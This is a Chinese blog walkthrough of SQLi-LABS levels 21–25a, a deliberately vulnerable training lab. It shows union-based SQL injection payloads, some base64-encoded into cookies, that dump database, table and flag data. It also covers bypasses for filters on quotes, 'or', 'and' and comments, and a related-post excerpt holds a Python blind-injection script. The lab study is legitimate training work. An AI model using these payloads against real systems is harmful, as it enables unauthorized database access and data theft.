SQLi-LABS(21~25a关详解)

最新推荐文章于 2024-05-27 17:06:22 发布
最新推荐文章于 2024-05-27 17:06:22 发布
阅读量3.2k 收藏 6
点赞数 4
分类专栏: CTF 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41429081/article/details/101168118
版权
本文详细介绍SQLi-LABS系列的Less-21至Less-25a的SQL注入攻击方法,包括如何利用base64编码绕过防御,进行联合查询获取数据库信息,以及面对不同过滤条件时的注入技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQLi-LABS Less-21

查看题目环境

图片图片
登陆给我回显的数据是I LOVE YOU COOKIES。
这题看了网上的wp才知道原来是将我们的uname和passwd都进行base64编码,表示不知道怎么看出来的。

 Cookie:uname=YWRtaW4=

图片

测试注入点

尝试

Cookie= uname=admin'

图片转成base64就是

Cookie= uname=YWRtaW4n

图片
可以发现报错信息如下,通过报错信息可以知道,可以使用’)闭合,又因为前面有回显数据,所以判断可以使用联合查询

SQL注入

因为前面测得具有回显,所以采取union联合查询
流程为

查找列数

Cookie: uname=admin') order by 3 #

转base64

Cookie: uname=YWRtaW4nKSBvcmRlciBieSAzICM=

#用于注释掉sql语句后面的内容,最终查出返回的列数为3列(列数一个一个试,最大的一个数,且不报Unknown column ‘*’ in ‘order clause’)

查询数据库

Cookie:uname=-1') union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata) #

转base64

Cookie:uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwxLChTRUxFQ1QgR1JPVVBfQ09OQ0FUKHNjaGVtYV9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSkgIw==

这边uname传入一个数据库中没有的值即可,因为如果是数据库中存在的值,即会返回多条记录,会显示前一个找到的值,而我们想要的将无法显示。
同时我们使用GROUP_CONCAT将查询到的数据库名拼接显示

查询数据库中的表

Cookie:uname=-1') union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" ) #

转base64

Cookie:uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwxLChTRUxFQ1QgR1JPVVBfQ09OQ0FUKFRBQkxFX05BTUUpIEZST00gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBXSEVSRSBUQUJMRV9TQ0hFTUE9ImN0ZnRyYWluaW5nIiApICM=

查表中的字段

Cookie:uname=-1') union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag') #

转base64

Cookie:uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwxLChTRUxFQ1QgR1JPVVBfQ09OQ0FUKGNvbHVtbl9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIFdIRVJFIHRhYmxlX25hbWUgPSAnZmxhZycpICM=

查数据

Cookie:uname=-1') union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag) #

转base64

Cookie:uname=LTEnKSB1bmlvbiBzZWxlY3QgMSwxLChTRUxFQ1QgR1JPVVBfQ09OQ0FUKGZsYWcpIEZST00gY3RmdHJhaW5pbmcuZmxhZykgIw==

SQLi-LABS Less-22

查看题目环境

图片图片
登陆给我回显的数据是I LOVE YOU COOKIES。
因为做完less21,所以直接尝试是不是对uname和passwd进行过base64
图片
可以发现确实是对uname和passwd进行了base64加密

测试注入点

尝试

Cookie= uname=admin"

图片 转成base64就是

Cookie= uname=YWRtaW4i

图片
可以发现报错信息如下,通过报错信息可以知道,可以使用双引号闭合,又因为前面有回显数据,所以判断可以使用联合查询

SQL注入

因为前面测得具有回显,所以采取union联合查询
流程同Less21

SQLi-LABS Less-23

查看题目环境

图片
首先可以看到这题传入id=1后,会有回显,显示出该条记录

测试注入点

构造payload

http://7bebb370-fa5d-43b9-8bfb-4b21ace1fa74.node1.buuoj.cn/Less-23/?id=1' or '1'='1

页面正常回显

payload

http://7bebb370-fa5d-43b9-8bfb-4b21ace1fa74.node1.buuoj.cn/Less-23/?id=1'and '1'='2

页面无数据显示

由此可以判断出:此处具有Sql注入漏洞

SQL注入

因为前面测得具有回显,所以采取union联合查询
这边发现使用–+或者#注释都会报错,从报错信息看应该是把他们都过滤了,所以这边使用or ‘1’='1闭合后面的单引号
后续详细联合查询可以参考Less1

SQLi-LABS Less-24

查看题目环境

图片
看了网上的大概思路是注册一个用户名为admin’#的用户,然后登陆进去改密码的时候,后台的sql语句会自动构建出修改admin的密码的语句,达到修改admin密码的效果

这题我在buu平台上好像有点问题,所以这边没有能复现了。

SQLi-LABS Less-25

查看题目环境

图片
首先可以看到这题传入id=1后,会有回显,显示出该条记录
同时通过下面的提示我们大概可以看出,这题是过滤了’OR‘和’AND‘
后面测试的时候发现还过滤了#

测试注入点

构造payload

http://7bebb370-fa5d-43b9-8bfb-4b21ace1fa74.node1.buuoj.cn/Less-25/?id=1'

图片
通过报错信息可以发现可以使用单引号闭合。
由此可以判断出:此处具有Sql注入漏洞

SQL注入

其实过滤掉or和and对我们注入并没有什么影响,因为我们不需要使用or闭合后面的单引号
找列数因为要用到order,可以双写or绕过,就是oorrder可以绕过
然后#可以使用–+替代
后续详细联合查询参考Less1

SQLi-LABS Less-25a

查看题目环境

图片
首先可以看到这题传入id=1后,会有回显,显示出该条记录
同时通过下面的提示我们大概可以看出,这题是过滤了’OR‘和’AND‘
后面测试的时候发现还过滤了加号和#

测试注入点

构造payload

http://7bebb370-fa5d-43b9-8bfb-4b21ace1fa74.node1.buuoj.cn/Less-25a/?id=1 oorr '1'='1'

发现能正常显示,所以应该是数字型注入

SQL注入

找列数因为要用到order,可以双写or绕过,就是oorrder可以绕过
然后又用到or的地方都可以用oorr绕过
后续详细联合查询参考Less1

sqli-labs----1-4详解
weixin_43061418的博客
08-27 277
了解知识 数据库进行查库、查表、查字段、查字段信息的语句(此处以表security下的users为例) show databases;查看所有的数据库,等同于select schema_name from information_schema.schemata; show tables;同样也可以在information_schema中查看,select table_name from tables where table_schema=‘security’; 查users下的字段 select co
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1824
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLi LABS Less 25a 联合注入+布尔盲注+时间盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi25aSQLi-LABS Less-25a,SQLi-LABS Less 25a,SQLiLABS Less25a,SQLi Less 25a
SQL-labs的第25a——or和and被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 212
有回显点我们选择联合攻击。判断回显点的方式和第25一样。这说明这无闭合方式,是数字型注入
sqli-labs-master第2525a
m_ing
05-17 826
25 http://192.168.89.139/sqli-labs-master/Less-25/ 我们看到提示:过滤‘or’和‘and’。为了进一步确认看下源代码 确实是这样,我们想一下还有哪些逻辑运算符: 那就直接改为|| &&利用 http://192.168.89.139/sqli-labs-master/Less-25/?id=1%27%20||%201=1%20%23 剩下的注入方式都和以前同样,就不测试了… 第25a和二十五一样,这是过滤了注释符和or
sqli-labs个人练习 通总结
Tajang的大千世界
07-10 838
这个系列是我在sqli-labs中练习SQL注入的解题过程。 随缘更新 less-1 打开卡 根据提示得知我们应该传入id值,先?id=1'测试一下 报错,把单引号去掉试试 成功返回数据,再测试?id=2 返回数据,再尝试一下?id=2-1 仍然显示id=2的数据,排除数字型注入,大概是字符型注入了,尝试封闭单引号并且注释后面的语句 猜解字段数,?id=1' order by 1,2,3 --+ 没有报错,测试是否有4个字段?id=1' order by 1,2,3,4 --+ 报错,说明
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
搭建sqli-labs靶场的过程相对简单。首先,用户需要准备一个包含Apache、MySQL和PHP的环境,例如使用wampserver或phpstudy等工具进行快速搭建。然后,将下载的sqli-labs-php7.zip解压到网站的根目录下,例如...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2282
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1031
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs less 24
weixin_34362790的博客
08-11 465
Less-24 Ps:本可能会有朋友和我遇到一样的问题,登录成功以后没有修改密码的相操作。此时造成问题的主要原因是logged-in.php文件不正确。可重新下载解压,解压过程中要主要要覆盖。 本为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致sql注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发sql注入。二次排序注入思路: 1.黑...
SQLI-labs-第二十四
weixin_54055099的博客
05-24 773
Sqli-labs第24,二次注入
SQli-labs 进阶 21-38
感恩
09-15 429
SQLI-LAB less21~38
九、SQL-labs的第24——二次注入(Post)
qq_73393033的博客
08-03 625
二次注入首先的一点就要在HTTP请求中提交恶意代码,将这个恶意代码存储在数据库中,以便后面使用。在第24,我们是通过注册新账号这种方式,将恶意代码存储到数据库中。假设我们的攻击目标是Dummy。
sqli-labs Less-2525a(sqli-labs指南 2525a)
m0_54899775的博客
12-25 1055
sqli-labs Less-2525a(sqli-labs指南 2525a)
SQLI-labs-第二十五和第二十五a
weixin_54055099的博客
05-27 1221
SQLI-labs-第二十五和第二十五a,绕过and 、or过滤
sqli--labs 进阶篇 23_24
Lucky小小吴的小屋
01-30 649
直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息。到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在。pass_change.php 登录成功后,有更新操作的处理。源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能。更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!注册一个新的,账号:admin’# ,密码:123。进一步确定自己的推论,源码中,存在过滤掉一些注释语句。
sqli-labs第二十四(二阶注入)
qq_42266432的博客
09-03 1090
进入第二十四,这叫二阶注入,二阶注入个人感觉和存储型xss有些类似,大致分为以下几步: 攻击者在HTTP请求中提交恶意代码(可以是sql,js脚本等)。 应用将输存储在数据库以便后面使用并响应请求。 攻击者提交其他请求。 为处理其他请求,应用会检索已经存储的输入并处理它,从而导致攻击者注入的恶意代码被执行。 先去看看源码: login.php 中mysql_real_escape_string()函数可以转义 SQL 语句中使用的字符串中的特殊字符,无法注入 login_crea
sqli-labs/Less-24
m0_71299382的博客
11-19 316
sqli-labs第二十四
sqli-labs第八详解
最新发布
03-27
### SQLi-Labs 第八解析 #### 背景介绍 SQLi-Labs 是一款用于学习和实践 SQL 注入技术的开源工具。第八的目标是通过 SQL 注入漏洞获取数据库的相信息,例如数据库名称或其他敏感数据。 --- #### 技术分析与解决方法 ##### 1. 判断是否存在 SQL 注入漏洞 在本卡中,`index.php?id=1` 参数存在潜在的 SQL 注入风险。可以通过输入特殊字符来验证这一点。例如,当提交 `id=1'` 或者类似的畸形输入时,如果页面返回异常行为(如错误提示或者逻辑变化),则可以初步确认该参数可能存在注入点[^2]。 ##### 2. 探测注入方式 由于题目描述提到没有明显的报错信息,而是依赖于特定反馈机制——即 “You are in...”,因此需要利用布尔盲注的方式逐步推断目标数据库的信息[^4]。 ###### (a) 数据库长度检测 为了高效地提取数据库名字,首先应确定其长度。以下是实现此功能的一个 Python 示例脚本: ```python import requests def get_database_length(): url = "http://localhost/sqli-labs/Less-8/index.php" for i in range(20): # 假设最大可能长度不超过20 payload = f"1' AND LENGTH(DATABASE())>{i}-- " data = {'id': payload} response = requests.get(url, params=data) if 'You are in...........' not in response.text: return i database_length = get_database_length() print(f"The length of the database name is {database_length}.") ``` 上述代码会不断调整条件表达式的阈值直到找到确切的字数为止。 ###### (b) 枚举数据库名称 一旦得知了数据库的名字总共有多少字母组成之后,就可以逐位读取这些字符的内容了。下面展示了一个简单的循环结构用来完成这项任务: ```python def retrieve_database_name(length): db_name = "" charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.-" # 可能使用的字符集 url = "http://localhost/sqli-labs/Less-8/index.php" for pos in range(1, length + 1): for char in charset: payload = f"1' AND SUBSTRING((SELECT DATABASE()),{pos},1)=CHAR({ord(char)})-- " data = {'id': payload} response = requests.get(url, params=data) if 'You are in...........' in response.text: db_name += char break return db_name db_name_result = retrieve_database_name(database_length) print(f"The database name is '{db_name_result}'.") ``` 这段程序基于之前计算出来的长度值逐一测试每一位对应的 ASCII 编码数值,并拼接成完整的字符串形式输出结果[^3]。 --- #### 总结 通过对 Less-8 的深入研究可以看出,在面对无明显错误回显的情况下,采用布尔型时间延迟等隐秘手法同样能够成功实施攻击。然而值得注意的是,在真实环境中进行此类操作往往违反法律法规,请务必仅限于授权范围内练习! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值